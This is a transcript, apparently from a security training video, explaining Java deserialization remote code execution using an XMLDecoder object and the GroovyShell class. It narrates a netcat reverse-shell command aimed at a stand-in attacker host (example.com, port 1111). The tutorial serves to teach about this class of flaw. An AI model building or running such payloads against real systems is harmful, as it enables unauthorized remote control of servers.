Welcome back, guys. Right now, I'm going to discuss remote code execution via deserialization. What we can do in web applications is we can serialize and deserialize the data. For those of you who are not familiar with serialization, I will provide just a very brief one-sentence introduction, okay? So, serialization is about saving a state of a given object. And actually, serialization is a programming concept. And what we can do is we can, as I mentioned, serialize the data and then deserialize the data. And the interesting part from security point of view is deserialization, because via insecure deserialization, we can launch, for example, remote code execution. And this is exactly what I'm going to discuss in this video. So let me provide you with a sequence of steps that make this attack possible. First, we are going to prepare a malicious serialized object, and then we are going to deliver this object to the web application. When this object is deserialized, then the remote code execution is triggered, and well, this is the end of the game, right? So it sounds cool, I believe, for you. But now the question is like this. How does the malicious serialized object look like? If we don't know how it looks like, well, then we cannot start, right, with this attack. So let me now tell you how it looks like, and let's proceed with our attack. So here it is. You've got a malicious serialized object in Java. And before I go into the details of this particular malicious serialized object in Java, I have to tell you something more about serialization in different technologies. It's really important. So serialization works differently in different technologies, and this is what you have to keep in mind. It works differently in Java. It works differently in Python, PHP, and other technologies, okay? And the consequence is that the malicious serialized objects are different in Java, Python, PHP, and so on and so forth, right? So this is what you have to be really aware of. There is no single malicious serialized object that can be used in all technologies. No, it doesn't work this way, right? This is, let's say, technology specific. Okay, so now you understand this kind of stuff also. So now we can actually dig into the details of the malicious serialized object in Java. And maybe one more sentence. Why Java? Well, there are many technologies. I have to choose something in this video. And Java is extremely popular all over the world. There are really many Java-based web applications. So I decided to bring this example in Java, okay? Great. Now, so far, so good. Now let's dig into the details of this malicious serialized object in Java. So what you can see here is that you can see Java version 1.8.0, and then the important part is the class, Java Beans XML decoder. This is very important because this class is used for serialization in Java, so we are going to use it, right? Now, please take a look at this line. nc-e bin bash example.com 1111 execute. This is the command that I want to execute on the vulnerable machine, okay? And this command is responsible for establishing a reverse shell connection to the attacker controlled machine, and the attacker controlled machine is example.com. And it has to connect to a given port on the attacker controlled machine, and this port is 1111, right? So we have to be really precise here. We have to specify the attacker's machine and the port, right? To make this reverse shell connection. But this reverse shell connection will not work if we don't have a class that allows us to do some shell commands, right? In other words, we need a class that allows us to launch shell commands. If we don't have it, then we cannot launch remote code execution via deserialization. I believe that this is clear for you. And to make it happen or to make it work, we are going to use Groovy Lang Groovy Shell. Please take a look at this line. This class is used in Java to actually execute the shell commands. And if I want my shell command to be executed, so my shell command is like establish reverse shell connection, then I need to use a class that allows me to launch shell commands. And well, Groovy Lang Groovy Shell is just used for this purpose. If you are a Java programmer, then you probably know that this class can be used for launching shell commands. And that's great, and I need it. I need to use this class to launch my own command. And you have to also keep in mind that, well, this class has to be loaded in the class path. Otherwise, it will not work, okay? So yeah, let me summarize it very briefly, because it may be complicated for some people. Java Beans XML decoder. So this is the class that we are using for serialization in Java. Next, nc-e beanbash example.com 1111 execute. This is the command that we want to execute as a result of the remote code execution attack via deserialization on a vulnerable machine. But in order to execute this command, we need a class that allows us to execute shell commands in Java. And here we are using Groovy Lang Groovy Shell for this purpose. It has to be loaded in the class path so that it works. And then, yeah, connecting all the dots, and we've got reverse shell connection as a result of remote code execution via deserialization, right? I believe that this is clear for you, maybe a little bit complicated, but well, this is how it works. So yeah, let me right now jump to the demo and let me show you how it works in practice.